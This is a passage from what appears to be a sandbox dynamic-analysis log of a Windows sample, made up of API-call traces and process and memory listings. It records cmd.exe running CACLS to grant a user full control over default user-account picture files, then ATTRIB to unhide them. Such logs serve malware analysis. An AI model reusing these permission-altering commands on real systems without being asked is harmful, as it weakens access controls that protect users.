_String2="PATH") returned -13 [0178.956] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0178.956] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0178.956] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0178.956] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0178.956] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0178.956] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0178.956] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0178.956] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0178.956] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0178.956] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0178.956] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0178.956] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0178.956] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0178.956] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0178.956] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0178.956] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0178.956] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0178.956] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0178.956] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0178.956] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0178.956] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0178.957] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0178.957] _wcsicmp (_String1="CACLS", _String2="FOR") returned -3 [0178.957] _wcsicmp (_String1="CACLS", _String2="IF") returned -6 [0178.957] _wcsicmp (_String1="CACLS", _String2="REM") returned -15 [0178.957] _wcsnicmp (_String1="CACL", _String2="cmd ", _MaxCount=0x4) returned -12 [0178.957] SetErrorMode (uMode=0x0) returned 0x0 [0178.957] SetErrorMode (uMode=0x1) returned 0x0 [0178.957] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x2e1e98, lpFilePart=0x1af06c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1af06c*="Desktop") returned 0x18 [0178.957] SetErrorMode (uMode=0x0) returned 0x1 [0178.957] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0178.957] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0178.962] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0178.963] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x1aede8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aede8) returned 0xffffffff [0178.963] GetLastError () returned 0x2 [0178.963] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS", fInfoLevelId=0x1, lpFindFileData=0x1aede8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aede8) returned 0xffffffff [0178.963] GetLastError () returned 0x2 [0178.963] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x1aede8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aede8) returned 0x2e2180 [0178.963] FindClose (in: hFindFile=0x2e2180 | out: hFindFile=0x2e2180) returned 1 [0178.963] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0x1aede8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aede8) returned 0xffffffff [0178.964] GetLastError () returned 0x2 [0178.964] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x1aede8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aede8) returned 0x2e2180 [0178.964] FindClose (in: hFindFile=0x2e2180 | out: hFindFile=0x2e2180) returned 1 [0178.964] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0178.964] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0178.964] GetConsoleTitleW (in: lpConsoleTitle=0x1af2e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0178.964] InitializeProcThreadAttributeList (in: lpAttributeList=0x1af168, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1af230 | out: lpAttributeList=0x1af168, lpSize=0x1af230) returned 1 [0178.964] UpdateProcThreadAttribute (in: lpAttributeList=0x1af168, dwFlags=0x0, Attribute=0x60001, lpValue=0x1af228, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1af168, lpPreviousValue=0x0) returned 1 [0178.964] GetStartupInfoW (in: lpStartupInfo=0x1af124 | out: lpStartupInfo=0x1af124*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0178.964] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0178.965] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile11.bmp\" /E /G EEBsYm5:F /C ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x1af1c4*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile11.bmp\" /E /G EEBsYm5:F /C ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1af210 | out: lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile11.bmp\" /E /G EEBsYm5:F /C ", lpProcessInformation=0x1af210*(hProcess=0x50, hThread=0x4c, dwProcessId=0xa48, dwThreadId=0xb10)) returned 1 [0178.968] CloseHandle (hObject=0x4c) returned 1 [0178.968] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0178.968] GetEnvironmentStringsW () returned 0x2e0308* [0178.968] FreeEnvironmentStringsW (penv=0x2e0308) returned 1 [0178.968] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0179.051] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x1af104 | out: lpExitCode=0x1af104*=0x0) returned 1 [0179.052] CloseHandle (hObject=0x50) returned 1 [0179.052] _vsnwprintf (in: _Buffer=0x1af24c, _BufferCount=0x13, _Format="%08X", _ArgList=0x1af110 | out: _Buffer="00000000") returned 8 [0179.052] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0179.052] GetEnvironmentStringsW () returned 0x2e2410* [0179.052] FreeEnvironmentStringsW (penv=0x2e2410) returned 1 [0179.052] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0179.052] GetEnvironmentStringsW () returned 0x2e2410* [0179.052] FreeEnvironmentStringsW (penv=0x2e2410) returned 1 [0179.052] DeleteProcThreadAttributeList (in: lpAttributeList=0x1af168 | out: lpAttributeList=0x1af168) [0179.052] GetConsoleTitleW (in: lpConsoleTitle=0x1af54c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0179.053] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0179.053] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0179.053] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0179.053] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x1aede8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aede8) returned 0xffffffff [0179.053] GetLastError () returned 0x2 [0179.053] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB", fInfoLevelId=0x1, lpFindFileData=0x1aede8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aede8) returned 0xffffffff [0179.053] GetLastError () returned 0x2 [0179.053] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x1aede8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aede8) returned 0x2de4d8 [0179.054] FindClose (in: hFindFile=0x2de4d8 | out: hFindFile=0x2de4d8) returned 1 [0179.054] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x1aede8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aede8) returned 0xffffffff [0179.054] GetLastError () returned 0x2 [0179.054] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x1aede8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aede8) returned 0x2de4d8 [0179.054] FindClose (in: hFindFile=0x2de4d8 | out: hFindFile=0x2de4d8) returned 1 [0179.054] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0179.054] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0179.054] GetConsoleTitleW (in: lpConsoleTitle=0x1af2e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0179.054] InitializeProcThreadAttributeList (in: lpAttributeList=0x1af168, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1af230 | out: lpAttributeList=0x1af168, lpSize=0x1af230) returned 1 [0179.054] UpdateProcThreadAttribute (in: lpAttributeList=0x1af168, dwFlags=0x0, Attribute=0x60001, lpValue=0x1af228, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1af168, lpPreviousValue=0x0) returned 1 [0179.054] GetStartupInfoW (in: lpStartupInfo=0x1af124 | out: lpStartupInfo=0x1af124*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0179.055] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0179.055] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile11.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x1af1c4*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile11.bmp\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1af210 | out: lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile11.bmp\"", lpProcessInformation=0x1af210*(hProcess=0x4c, hThread=0x50, dwProcessId=0x55c, dwThreadId=0xcb8)) returned 1 [0179.057] CloseHandle (hObject=0x50) returned 1 [0179.057] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0179.057] GetEnvironmentStringsW () returned 0x2e2410* [0179.057] FreeEnvironmentStringsW (penv=0x2e2410) returned 1 [0179.057] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0179.721] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x1af104 | out: lpExitCode=0x1af104*=0x0) returned 1 [0179.721] CloseHandle (hObject=0x4c) returned 1 [0179.721] _vsnwprintf (in: _Buffer=0x1af24c, _BufferCount=0x13, _Format="%08X", _ArgList=0x1af110 | out: _Buffer="00000000") returned 8 [0179.721] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0179.722] GetEnvironmentStringsW () returned 0x2e2410* [0179.722] FreeEnvironmentStringsW (penv=0x2e2410) returned 1 [0179.722] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0179.722] GetEnvironmentStringsW () returned 0x2e2410* [0179.722] FreeEnvironmentStringsW (penv=0x2e2410) returned 1 [0179.722] DeleteProcThreadAttributeList (in: lpAttributeList=0x1af168 | out: lpAttributeList=0x1af168) [0179.722] _get_osfhandle (_FileHandle=1) returned 0x7 [0179.722] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0179.722] _get_osfhandle (_FileHandle=1) returned 0x7 [0179.722] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0179.722] _get_osfhandle (_FileHandle=0) returned 0x3 [0179.722] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0179.722] SetConsoleInputExeNameW () returned 0x1 [0179.722] GetConsoleOutputCP () returned 0x1b5 [0179.722] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0179.722] SetThreadUILanguage (LangId=0x0) returned 0x409 [0179.723] exit (_Code=0) Process: id = "329" image_name = "cacls.exe" filename = "c:\\windows\\system32\\cacls.exe" page_root = "0x7ea16d80" os_pid = "0xa48" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "328" os_parent_pid = "0xa14" cmd_line = "CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile11.bmp\" /E /G EEBsYm5:F /C " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 24969 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 24970 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 24971 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 24972 start_va = 0xb0000 end_va = 0xeffff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 24973 start_va = 0x770000 end_va = 0x778fff entry_point = 0x770000 region_type = mapped_file name = "cacls.exe" filename = "\\Windows\\System32\\cacls.exe" (normalized: "c:\\windows\\system32\\cacls.exe") Region: id = 24974 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 24975 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 24976 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 24977 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 24978 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 24979 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 24980 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 24981 start_va = 0xf0000 end_va = 0x156fff entry_point = 0xf0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 24982 start_va = 0x1e0000 end_va = 0x2dffff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 24983 start_va = 0x3f0000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 24984 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 24985 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 24986 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 24987 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 24988 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 24989 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 24990 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Thread: id = 445 os_tid = 0xb10 Thread: id = 447 os_tid = 0xbf0 Process: id = "330" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16ca0" os_pid = "0x55c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "328" os_parent_pid = "0xa14" cmd_line = "ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile11.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 25013 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 25014 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 25015 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 25016 start_va = 0x1b0000 end_va = 0x1b6fff entry_point = 0x1b0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 25017 start_va = 0x250000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 25018 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 25019 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 25020 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 25021 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 25022 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 25023 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 25024 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 25025 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 25026 start_va = 0x110000 end_va = 0x11ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 25027 start_va = 0x3c0000 end_va = 0x4bffff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 25028 start_va = 0x6e2b0000 end_va = 0x6e2ccfff entry_point = 0x6e2b0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 25029 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 25030 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 25031 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 25032 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 25033 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 25034 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 25035 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 25036 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 25037 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 25038 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 25039 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 25040 start_va = 0x290000 end_va = 0x357fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000290000" filename = "" Region: id = 25041 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 25042 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 450 os_tid = 0xcb8 Process: id = "331" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16c20" os_pid = "0x47c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile12.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile12.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 25043 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 25044 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 25045 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 25046 start_va = 0x170000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 25047 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 25048 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: 